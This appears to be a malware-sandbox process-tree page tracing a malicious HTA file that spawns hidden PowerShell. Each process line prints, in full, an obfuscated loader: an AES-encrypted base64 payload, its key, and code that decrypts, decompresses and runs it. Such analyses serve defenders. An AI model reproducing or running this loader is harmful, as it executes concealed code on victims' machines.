| ZeroBOX

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\paladin.hta

    3040
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG | powershell - }

      2196
      • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $czJl = 'AAAAAAAAAAAAAAAAAAAAAI/qR6Qo+tei6M2ZAL5aETbauJv4e0Z5t3z1uC9ud0jKjvIYyApg827M8IEYlnMkcrVOj4liYnaMiTZzMn1qXT08YYK7IM8JB29pYJgIM5XlJ0S2yPsO7Hn4SIT738/EImNcjOHzN5qSYzkU3oJQKn5VoZLpsd0etc/qgLwIShRMrYah7eOtDD90TEo/sQUb/4qG1UyzfrPEnEhNiodPv2UZDGW0w2aMsGrF8EoHiyNBLV2tyqGdoY4NBEfbjB151RdoGvtaocKX9plmeoOtqSiQyDuVt5ulS93uMYYyqc51yq26WTECSSUNbdVtMq7IXadWiS1yQP1e/qDT/go/c5G1At1XYqCP1//ThFM4kVpWRg9eGq5k6Lp59tCYVBx96xSGlsgFN/A9cCwsEeNwRmH6iNR2Flab0lQrz3Uut4SX/r/4lkfm7TC2Rp4bNbE4obVZ43EDTjrZICq0gUTXl76tG+5jxyoFrp5bX3M04tir4LIy2GaqcBD2XGWN6Su1XWUc/cxYO5lrB+tf0iATixZsYb9NQu/G/RdKwoFp3gm8xXbaiOeQp8GukSwsH2BRtW7EGCGcwgvPqlwEEiH6nF6v1are+75y1bOxgoGdmVEHO02NQMQGqIBZbBggMtTQ1HZBKuD7cCW968cJV67QBefrwuHm9+Ys9OgX8vHHx8nFLJclw+zT6SKH2l4lQyhx66iBZ1d94g1xXwe1wRukzJN0CWiIg97FmIRNaVXwFqMA1dvi8mkmP2xD2+1ACx9asVnsx9lSJNIinkXnoBW1K5u9DaJ2aSA6oM5Fk/Zb2yCgqN2S7QNyjb7wdAxgJe/EsW7ULK7kl6fZMbRBrlZ4zcp1W6Dx0H4ENZJdHT05oR6zRwGo7DIYKLAsBhl0umLIlw+fMdtAxdcvnAGDE2cNv1qjRelOCwMKOtQNAi2PxiKQ6XuDFGvGkwNBbwqfTPsBSR+aKrBdqgoLIMYIDzoQXgFC6AlIGQBM2lerjWZe+vUH7jaXe068aJASoPAazELAnwtP4fC0mjFbrXlD4yGUwWnCV1NY6YhpDFwPK6I5u+R/4qZPz7Yn9TkFfqTykYc3oWknjge106xxCNtjur/Dytp1VbUDNdTDBS2piV0XpiDaqf+G6UlYy5/Vad2wahouzjsLuVgUpOxMYK2Oz+s2VuvCUs2urIThOXZAAiq9Z4VnA8HbmCifp08UmITK0MrIAGAu2VRoho17rCi2+yzDaTIQraJ0ZMoBbWseQEym6I3V6zuVjOvKOCfMbODXEbvuwnrEQdB1GRRdTVvYgBP7vOAjSdW97bKCNhYKWLzKIARtKT4oWcuYLMGHDvhABCmDUOOFvHoKus3j5RZExdjaVBCfjrFHrUkNq6+bl2eN7sxpsE72dg/eJGzYamnhpmN7jNvDdDS8u3dePXBTJoKrp/3Wkk7UbENzPzcGexdPbCxqEkmrt/pLvnJTFX0CVa7mizCOPLEv2V9W/y0e2q5YgpT7Ro8x5f5PV3cAm3liwCKvg8KwIUuzIMaSzNmC1H1hoRMRHf4TyVCRqIr9MoRQORb/GCZeR8QQFw1OUekRN80DUu6s5DDI1CvJhvryer0wXIM1K0WnIZOe2sBqOpjzjeGGo5HU9EjWjXq5/YQJWYVcNeMSz6f9JnUmZtXcV2frbBU7D2SlBDXeIuvibv51e4rkxrvM2rmMXLvsbY7Zb5KcGcpgnGavjVKkvsp24+vXDYSM++am4eN2qkfkhl7zrOO5LlIXDflN4t1eaAaH1FmiL84Df/4EPnb6RKx34uiEGpc5QiYx13ZGaPxkvx9B3prlEQilcgn1eoxKqS4iofitJSW2jlVrUdytxNuIz6HsmzboNiKDzpqjGC/ZLrzQAMjazkKIUMes15acNIgBV0sQWCB5TNvAkvVeyAwMXx7ufs8oHsbwcSUI54hQZMZC2acERYp7lgWV7nz5ipp1Bvg2aPjALI6/C1MQAzxNLgXJWowWriHAyFbbPU2mgO1nIOONmt09QbfHAUTnwIOjK3ZNLqHWxuEYuEaIOtQbN5Sfr7QgZ6UF4QeNEkzgaebL3JIiqEPXtS9DkhPpJ0r25FNl9842XeOES6cED7Zju/lJQMQA81sinTpngGN2uXmJGLCTI5nNsvV8ul7C00NGm8cTFChmAUwPAtMiaANf6pHAVyiCmiH6uqgFf9FcLY/VKVcepcleZLZs79IWJzElCrkVf0DZqvPYLyJgfbni/looKRE1g4gpDFjGMu7dL+KpREXHe/q07OndctU+EIKK+ia8Hq3ATKhk12uC8V/8tlDeNFfI0gODd6pTPy2y97DLl5E431pF6JVfZfAExWE8atZuwAQ0O70124s8kdRuRQ2PekXSlO01LNCVKtfFmEpBbz+BZ9Psgodx44CbD67PHXoaK7bkm0VkrN8W+f1aGkr2kQQ93PXaiaAocYgqpBF7tTTaz2qOu0+sKkhSSYgmFXwqCV9d2sLz2D7FLPRzkjOsb1YQcW+E3vncNvWUzOOHBx8QX45PDkhVMtCfeAs5yy0VnCygQxo30DsrBNnVS0+Ed0WHO9/gvYDLdm2fuOEZ6jf+7NOH9ikGegSRoZVpVTsrecrccgaFsZBXlqZOXBeoCATFmIePE5ZS0fSjXPZ1cX1N95UuOpueTESHvfgvghi+EGsJuP7w8WZHaGaiSNz3uDYNMznombCvH0MOttfo6ZH6pEIdpC0b2VR/aRO4xUiwPJwbNhQKJG2aAZASBOvXqB/yyjr/lgI9P7OpmTOTuNkX1PirZOCRXhV15Y7iKZVyVH9BuYE3yfyTqh2FirNVG44AKRVVtQyjY8hFghorYNpEDtBW5M48BJHgp/kGDK103MA1gpxURYWDesSO1ngs7UPhpBzd4KgDe0/M7c6r7+/A3RymIjmLFGsb9ssxItoctYx0KgQgN/gTMlyJ1l3uy/lRwqpV5RGTrYmOua9jg1TK0EQZztXthH1+lcNiGk8CnpdSpbNR5bTSzdVvu8C/LdM0IzA0+0b3TNNieyIdJPSdQj7eumvd6KsIT6NEMYrNnQ8NWW+Th9uQ2mCfxQzjmsHZP+pPl2R6TLxcCBQ31PvGBz3+Z0MPDP3YudqzqmtA5uiuuZAuOWRae63RJpLtFqAKK2CAS70x+LMIzgX5mHb5e/HBcJTT5lYuyyehgmAYvUEp7tzBiGXz0yziRHmwN9gkRcm/42C8QaguP+I217vsHER/jZOH/Cb6LeQTPXJclXbBi7DD+6Vd5M487qZyzPL9N9gCktFwyvYZIZyBGYH/rPFCwScBD36BinpLmOp7SuA9QQm/XfWxjRvWO8KN9OL21izaDyKLA1xnRF3roThMHg7Co19pTT7B8xQ2bumuP70rOGoZI+mNy6MncK4r1DW5Ct9uQPAwVNf2XW+qeY5T7kRhQq5QoBOX5lM6DPk6v7PKwFPJYzkEpVhjJ2tE7YS5LMJ9jJfTTdxA4SRvJvJkr4GB3KdeGvSsPDv7sR6FZoZ0ejg0eGsU3JeN7rm3pG+Y3gqVeNWDKUp5BehNAqp+QByozRbYdR0pbgmEMalLOgsRz0AOFbrmqZjZ9oyXO5Pcb7+em+7UtlX24jHRws6NV9lFRwFi8catLcm9ZWZrhsAY9bIi2WDaFfAjIvT8iynAt+3pXnmogEphPG8zLk+dQvFIpU39m30arG/OZ5ms66QMczLjeX/r41o0KT5z7PO3EK/Bym6SsT0rYwHjnT0wuIp0lM3fqH85KuNQ6OC6kWO/HuJDB7+oPqTAg+P1OfSh1IROLRt6uPLjz4fcKph5Nb30xH7SjDHahdStmpoaQCt++BGcQMbX89tZo7w8NFIqBLQeOyVtJNRQvxbKA5hORWN9ARRdwHWeB2I78X/Qzx3EVozaJDBh7za9UY+0+DEqJ1nFoiN+sfEytGepOpKz2A76ymbCWznZCcLrGlyd1C01h7r+Jd4mZp8qVGfLU5fe+7VRPNPs5le9qmSM4cKP5sBe4DhZGZ60DrC6oOTWFLa172ymLasXyxfASMMEXZ4iWXr59lwjqPirFMahDCwi1jbcOQ9b5aGBMlJZIGdeEDJvOwz66ZeXH6MRIy8WvsegJaWb3V8NLequguv3DsLi5Jh6aSv2cnufbeIKbpMr';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG | powershell -

        296
        • powershell.exe powershell.exe $czJl = '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';$VhSdGfXz = 'elBmUmlvU01LUVR0YndBZW5CamxHdVBVeXhsSXJFQW8=';$ShArHJOr = New-Object 'System.Security.Cryptography.AesManaged';$ShArHJOr.Mode = [System.Security.Cryptography.CipherMode]::ECB;$ShArHJOr.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$ShArHJOr.BlockSize = 128;$ShArHJOr.KeySize = 256;$ShArHJOr.Key = [System.Convert]::FromBase64String($VhSdGfXz);$GYzdI = [System.Convert]::FromBase64String($czJl);$JdHTpYkG = $GYzdI[0..15];$ShArHJOr.IV = $JdHTpYkG;$MoBZNPmUq = $ShArHJOr.CreateDecryptor();$sGBCqJHNo = $MoBZNPmUq.TransformFinalBlock($GYzdI, 16, $GYzdI.Length - 16);$ShArHJOr.Dispose();$yspwxwL = New-Object System.IO.MemoryStream( , $sGBCqJHNo );$QSeyl = New-Object System.IO.MemoryStream;$FVAMzPkmy = New-Object System.IO.Compression.GzipStream $yspwxwL, ([IO.Compression.CompressionMode]::Decompress);$FVAMzPkmy.CopyTo( $QSeyl );$FVAMzPkmy.Close();$yspwxwL.Close();[byte[]] $CvgAODNo = $QSeyl.ToArray();$TUzGASPG = [System.Text.Encoding]::UTF8.GetString($CvgAODNo);$TUzGASPG

          2424

Process contents

No process loaded Click on a process in the tree above to load its data.